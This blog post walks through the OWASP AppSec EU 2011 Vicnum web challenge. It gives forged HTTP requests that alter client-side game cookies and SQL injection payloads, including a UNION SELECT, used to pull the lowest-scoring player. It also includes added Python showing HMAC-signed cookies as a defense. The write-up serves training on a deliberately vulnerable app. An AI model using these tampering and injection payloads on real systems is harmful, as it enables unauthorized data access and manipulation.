Tuesday, February 22, 2011

Vicnum The Game Challenge -- OWASP AppSec EU 2011

Just a quick post about this nice and quick challenge. You can still play here, and congratulations to the winner Steve van der Baan (see his solution here).

Basically, the webapp chooses a random 3-digit number that we need to guess, but the challenge is to find a way to:
  • Hack the Game: guess with 0 tries (yep, better than a lucky guess) and with a number longer than 3 digits (1337, for example)
  • Find the database player with the worst possible score and place another record in the database with that player's name concatenated to your name and with a positive score. Something like "worst_player+"
First step: Hack the Game

Looking at the server response, a base64 encoded value can be observed:

If you decode it (469) and enter this number... you'll guess the value :)

However, it'll record that you tried once... so how do you get "0 guesses"? Easy: once you get one valid guess, the server issues the following cookies
       Milano=0012AA9B12good_username_ Brussels=0029A9B91crisp1; Geneva=92BEF345Apecan469
It's easy to spot the meaning of the cookies:
  • Milano==username
  • Brussels==number_of_tries
  • Geneva==guessed_number

So, launching the following request will get us through the first part:
GET /vicnum4.php HTTP/1.1
Host: vicnum.ciphertechs.com
Referer: http://vicnum.ciphertechs.com/cgi-bin/vicnum2.pl
Cookie: Milano=0012AA9B12good; Brussels=0029A9B91crisp0; Geneva=92BEF345Apecan1337
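From the defender's side, the reason this works is that the whole game state (username, number of tries, guessed number) lives in client-controlled cookies with no integrity check, so the server trusts whatever comes back. Added example, not part of the original post or of the Vicnum code: HMAC-signed state cookies in Python, with a constructed server key and a constructed "username|tries|number|tag" layout, that reject exactly the kind of edit shown in the request above.

```python
import hmac
import hashlib
from typing import Optional

# Constructed demo key; a real server loads it from a secrets store and never ships it to clients.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"


def sign_state(username: str, tries: int, number: int, key: bytes = SECRET_KEY) -> str:
    """Serialize the game state and append an HMAC-SHA256 tag over it."""
    payload = f"{username}|{tries}|{number}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def verify_state(cookie: str, key: bytes = SECRET_KEY) -> Optional[dict]:
    """Return the parsed state only if the tag verifies; None on any tampering or malformed input."""
    try:
        # rsplit from the right so a '|' inside the username cannot shift the fields
        username, tries, number, tag = cookie.rsplit("|", 3)
    except ValueError:
        return None
    payload = f"{username}|{tries}|{number}"
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    # constant-time comparison so the tag cannot be guessed byte by byte
    if not hmac.compare_digest(expected, tag):
        return None
    try:
        return {"username": username, "tries": int(tries), "number": int(number)}
    except ValueError:
        return None


def accept_win(cookie: str, key: bytes = SECRET_KEY) -> bool:
    """Server-side decision: valid tag AND a state the game logic could actually produce."""
    state = verify_state(cookie, key)
    if state is None:
        return False
    # Assumed game rules: a win needs at least one guess and the secret is a 3-digit number.
    return state["tries"] >= 1 and 100 <= state["number"] <= 999


if __name__ == "__main__":
    legit = sign_state("good", 1, 469)
    print("legit accepted:", accept_win(legit))
    # Same edit as the challenge: 1 try -> 0 tries, 469 -> 1337
    forged = legit.replace("|1|469|", "|0|1337|")
    print("forged accepted:", accept_win(forged))
```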


Second step: Hack the Database

After guessing the number properly, the webapp allows you to search for all the users that have guessed the number. It's a simple SQL injection.

So, injecting the following query into the search feature will list all the users:
  • player='+or+'1'%3d'1    => ' or '1'='1
And, after wasting some minutes trying to parse the server response, I realized that I could use the SQL injection itself to give me the "worst player"...
  • player='+union+select+min(count),'1','1','1'+from+results+where+'1'%3d'1  => ' union select min(count),'1','1','1' from results where '1'='1

So, we'll spot the user "appseceu" with -214748348 guesses, so it seems that we now have the username. Finally, using the trick from the first part (changing cookies), we solve the challenge:

GET /vicnum4.php HTTP/1.1
Host: vicnum.ciphertechs.com
Referer: http://vicnum.ciphertechs.com/cgi-bin/vicnum2.pl
Cookie: Milano=0012AA9B12goodappseceu_username_; Brussels=0029A9B91crisp1; Geneva=92BEF345Apecan1337


Solved :). Thanks for this mini-webchallenge. As a reminder, a new challenge will be published on the 21st of each month until the conference in June, so stay tuned to @appseceu.

Bonus Track:
Btw, a nice XSS :)

Regards,
Alex
